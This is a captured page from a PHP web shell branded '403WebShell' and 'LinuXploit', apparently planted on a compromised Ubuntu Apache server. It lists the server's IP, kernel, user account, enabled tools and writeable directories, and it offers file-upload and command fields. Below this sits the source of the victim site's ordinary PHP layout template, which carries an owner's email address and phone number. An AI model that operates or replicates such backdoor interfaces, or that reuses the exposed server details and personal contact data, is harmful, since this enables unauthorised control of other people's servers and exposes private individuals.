Warning: Trying to access array offset on null in /var/www/alexvillarreal/wp-content/mu-plugins/index.php on line 2

Deprecated: md5(): Passing null to parameter #1 ($string) of type string is deprecated in /var/www/alexvillarreal/wp-content/mu-plugins/index.php on line 2
403WebShell
403Webshell
Server IP : 74.208.250.37  /  Your IP : 216.73.216.233
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ubuntu 6.8.0-124-generic #124-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 13:00:45 UTC 2026 x86_64
User : miferval ( 1000)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/uecaitta/app/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/uecaitta/app/views/layout.php
<?php
/**
** layout.php
*/
?>
<!doctype html>
<html>
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	
	<title><?php echo $settings['site']['name'];?></title>
	<link rel="stylesheet" href="<?php echo TEMPLATE_FOLDER; ?>/css/mosaico.css" />
	<link rel="stylesheet" href="<?php echo TEMPLATE_FOLDER; ?>/style.css?v=1" />
	<link rel="stylesheet" href="<?php echo TEMPLATE_FOLDER; ?>/css/font-awesome.min.css">
	<link rel="stylesheet" href="<?php echo TEMPLATE_FOLDER; ?>/css/blueimp-gallery.min.css">
	<script>
		var siteglobal = { views_folder : '<?php echo TEMPLATE_FOLDER;?>',app_folder : '<?php echo APP;?>' }
	</script>
</head>
<body>
<header>
	<div class="container">
		<div class="logo col five mobil_center">
		Uecaitta
		</div>
		<div id="top_nav" class="col fourfive">
			<?php 
			switch ($params['page']) {
				case 'home'		:
				case 'about'	:
				case 'how' 		:
				case 'who'		:
				case 'services' :
					include 'menus/menu_hash.php';
					break;
				default:
					include 'menus/menu.php';
					break;
			}
			?>
		</div>
	</div>
</header>
<div id="main">
	<?php $dispatcher($params); ?>
	<div class="clear"></div>
</div>
<footer>
	<div class="container mobil_center">
	<div class="col three">
		&copy; Uecaitta 2016
	</div>
	<div class="col three">
	<h3>Menu</h3>
	<?php 
	switch ($params['page']) {
		case 'home'		:
		case 'about'	:
		case 'how' 		:
		case 'who'		:
		case 'services' :
			include 'menus/menu_hash.php';
			break;
		default:
			include 'menus/menu.php';
			break;
	}
	?>
	</div>
	<div class="col three">
		<h3>Contact</h3>
		<div class="item">
		<i class="fa fa-envelope"></i>
		alex.ruiz.cruz1@gmail.com
		</div>
		<div class="item">
		<i class="fa  fa-phone"></i>
		+521 818 161 2914
		</div>
	</div>
	<div class="clear"></div>
	</div>
</footer>
<div id="photos_snowlift" class="ajax_show">
	<div class="ajax_bg"></div>
	<div class="n9">
	<div class="container">
		<div class="n3">
			<div id="PhotoSnowliftContainer" class="photo_container"></div>
		</div>
	</div>	
	</div>
</div>
<!-- The Gallery as lightbox dialog, should be a child element of the document body -->
<div id="blueimp-gallery" class="blueimp-gallery blueimp-gallery-controls">
    <div class="slides"></div>
    <h3 class="title"></h3>
    <p class="description"></p>
    <a class="prev">‹</a>
    <a class="next">›</a>
    <a class="close">×</a>
    <a class="play-pause"></a>
    <ol class="indicator"></ol>
</div>
<script type="text/javascript" src="<?php echo TEMPLATE_FOLDER; ?>/js/jquery-2.1.4.min.js"></script>
<script type="text/javascript" src="<?php echo TEMPLATE_FOLDER; ?>/js/jquery.cycle2.min.js"></script>
<script type="text/javascript" src="<?php echo TEMPLATE_FOLDER; ?>/js/jquery.stellar.js"></script>
<script type="text/javascript" src="<?php echo TEMPLATE_FOLDER; ?>/js/galeria.js"></script>
<script type="text/javascript" src="<?php echo TEMPLATE_FOLDER; ?>/js/scripts.js"></script>


</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit